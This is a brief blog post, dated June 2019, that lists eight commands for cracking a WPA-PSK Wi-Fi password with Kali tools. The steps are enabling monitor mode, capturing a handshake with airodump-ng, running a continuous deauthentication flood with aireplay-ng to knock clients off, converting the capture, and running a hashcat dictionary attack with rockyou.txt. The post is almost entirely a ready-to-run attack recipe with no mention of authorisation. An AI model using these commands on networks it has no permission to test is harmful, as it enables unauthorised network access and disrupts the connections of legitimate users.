Friday, June 14, 2019

Crack WPA-PSK with Kali

1):
airmon-ng

2)Start Monitoring mode:
airmon-ng start wlan0

3):
airodump-ng wlan0mon

4)Capture frames:
airodump-ng --bssid BSSID_OF_AP -c CHANNEL -w FILE_NAME wlan0mon

5)Launch Unauthentication DoS:
aireplay-ng -0 0 -a BSSID_OF_AP wlan0mon

6)Stop Monitoring mode:
airmon-ng stop wlan0mon

7)Go to https://hashcat.net/cap2hccapx/ and upload the PCAP in order to have the HCCAPX file.

8):
hashcat -m 2500 -a 0 HCCAPX_FILE_PATH /usr/share/wordlists/rockyou.txt --force


No comments:

Post a Comment